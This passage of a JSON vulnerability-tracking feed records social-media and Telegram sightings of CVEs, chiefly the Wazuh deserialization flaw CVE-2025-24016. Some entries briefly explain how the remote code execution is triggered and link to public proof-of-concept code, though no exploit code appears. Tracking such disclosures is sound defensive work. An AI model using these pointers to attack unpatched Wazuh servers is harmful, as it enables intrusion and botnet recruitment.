(CVE-2025-24016) is being actively exploited to drop multiple Mirai botnet variants\u2014sparking massive DDoS attacks worldwide.\n\nMillions of IoT devices remain vulnerable, fueling relentless botnet growth and escalating global cyber threats.\n\nDetails here \u2193 https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html", "creation_timestamp": "2025-06-09T17:05:09.000000Z"}, {"uuid": "71d18b8a-698c-497e-b312-1446863fcef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2401", "type": "seen", "source": "https://t.me/cvedetector/20458", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-2401 - Immunity Debugger Buffer Overflow\", \n  \"Content\": \"CVE ID : CVE-2025-2401 \nPublished : March 17, 2025, 1:15 p.m. | 33\u00a0minutes ago \nDescription : Buffer overflow vulnerability in Immunity Debugger affecting version 1.85, its exploitation could allow a local attacker to execute arbitrary code, due to the lack of proper boundary checking. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"17 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-17T14:57:21.000000Z"}, {"uuid": "0fdb8e55-a20a-4a80-9509-9037889011ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://t.me/CyberBulletin/2675", "content": "\u26a1CVE-2025-24016: Unsafe Deserialization Vulnerability in Wazuh Leading to Remote Code Execution.\n\n#CyberBulletin", "creation_timestamp": "2025-03-18T05:11:08.000000Z"}, {"uuid": "a1c75d73-72ac-489f-8474-587391689592", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/67tsegYcQIUV7lyfyUyokIQvG0vHB8OXAelx-BGM_6cMQP8", "content": "", "creation_timestamp": "2025-04-22T05:00:08.000000Z"}, {"uuid": "1e2b8950-1191-4883-b170-ab8875834338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/KoImPbvq7TTeanbPRCUZjbRHe6kET-PXMoAHN1FRP5h8R3U", "content": "", "creation_timestamp": "2025-02-21T04:00:07.000000Z"}, {"uuid": "3a2f60db-6fbb-489b-a4d7-1c600a3fd105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9735", "content": "CVE-2025-24016: Unsafe Deserialization Vulnerability in Wazuh Leading to Remote Code Execution\n\nhttps://cvereports.com/cve-2025-24016-unsafe-deserialization-vulnerability-in-wazuh-leading-to-remote-code-execution/", "creation_timestamp": "2025-03-17T21:13:20.000000Z"}, {"uuid": "ab746d25-8093-4226-9f9a-a4065304c14f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/7079", "content": "\u2699\ufe0f Wazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.\n\n\ud83d\udd17 Source:\n https://github.com/0xjessie21/CVE-2025-24016\n\n#wazuh #deserialization #rce #cve", "creation_timestamp": "2025-03-30T19:49:57.000000Z"}, {"uuid": "fe21ae92-f5d8-42b7-8046-1f2dfbcff9d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24010", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861495371199240", "content": "", "creation_timestamp": "2025-01-20T15:55:40.971679Z"}, {"uuid": "45545ea4-b707-4a61-9467-c00090437f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24013", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113861519101056622", "content": "", "creation_timestamp": "2025-01-20T16:01:42.829420Z"}, {"uuid": "312d41db-fd5d-4133-8ee2-94981d8afd0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24010", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lg6qdyvs5b2n", "content": "", "creation_timestamp": "2025-01-20T16:16:08.227269Z"}, {"uuid": "1bf81b8e-0744-42fc-b512-b5c8248c1318", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24013", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lg6qe3bilp2e", "content": "", "creation_timestamp": "2025-01-20T16:16:10.931069Z"}, {"uuid": "9027c275-6e78-465f-a8ba-e0cd4aaae1e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24013", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lg6sigo7yx2r", "content": "", "creation_timestamp": "2025-01-20T16:54:26.023919Z"}, {"uuid": "ff8d8bbd-8515-4384-8abc-7891f7b9b92d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24010", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lg6sigrjjk2b", "content": "", "creation_timestamp": "2025-01-20T16:54:26.593123Z"}, {"uuid": "913700b9-d35e-4c77-a9e6-cc91bcbcf558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lg7hrnryqf27", "content": "", "creation_timestamp": "2025-01-20T23:15:22.507372Z"}, {"uuid": "4cca34ed-3ca0-45b9-b71a-99b84d6cf7dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/sakaijjang.bsky.social/post/3lj42pracr22d", "content": "", "creation_timestamp": "2025-02-26T18:59:16.298975Z"}, {"uuid": "7449362d-dbeb-4e19-89e5-e1a3e09ad606", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3lhvuva6clc2a", "content": "", "creation_timestamp": "2025-02-11T14:33:47.154078Z"}, {"uuid": "ccf480bc-c822-421f-bd73-b7f966dd1787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24015", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lqqt7gqpj22s", "content": "", "creation_timestamp": "2025-06-04T03:07:07.976055Z"}, {"uuid": "6f797b46-8bd9-491b-8df6-2d62b4ef6788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrrgpimc5v2g", "content": "", "creation_timestamp": "2025-06-17T02:21:19.766001Z"}, {"uuid": "4d3d7089-669c-4c4b-91f8-406d0bc29e2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3lrboz255ly2b", "content": "", "creation_timestamp": "2025-06-10T20:07:13.779484Z"}, {"uuid": "d14dca64-1b26-4308-8eab-ce7b622c23f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lruxkbm37a2z", "content": "", "creation_timestamp": "2025-06-18T12:00:38.222520Z"}, {"uuid": "e3d1b645-bc9b-474e-88a8-96822aa2ea22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/allaboutsecurity.bsky.social/post/3lrrzxvafhc24", "content": "", "creation_timestamp": "2025-06-17T08:06:06.536928Z"}, {"uuid": "94e3e49e-90c6-4618-94d6-00aa3857291f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lrltjc6nwk27", "content": "", "creation_timestamp": "2025-06-14T20:54:34.007553Z"}, {"uuid": "c92837c6-c1d4-4497-9241-82f9d29cc26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lrc77tsk7b2r", "content": "", "creation_timestamp": "2025-06-11T00:57:22.037291Z"}, {"uuid": "537794c0-9364-4fee-908e-38ce2b9347e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-29T03:12:16.000000Z"}, {"uuid": "2712b045-f714-4246-9432-c267360c4afc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://mastodon.social/users/leakix/statuses/115614941278580034", "content": "", "creation_timestamp": "2025-11-26T08:00:04.259540Z"}, {"uuid": "7a592dbb-ba35-418d-a1d2-2d88110eb3f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/leakix.bsky.social/post/3m6jf6csfgq2w", "content": "", "creation_timestamp": "2025-11-26T08:00:06.552126Z"}, {"uuid": "502bc8c3-af57-437f-8c69-aa89f3149628", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lwcpwz6otd2y", "content": "", "creation_timestamp": "2025-08-13T21:02:39.738923Z"}, {"uuid": "e648ce3b-43c2-48e5-bdfc-d18ca196c54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://gist.github.com/alon710/ebc4c8f6e728f6343eba07aa950a7550", "content": "", "creation_timestamp": "2026-01-24T21:24:46.000000Z"}]}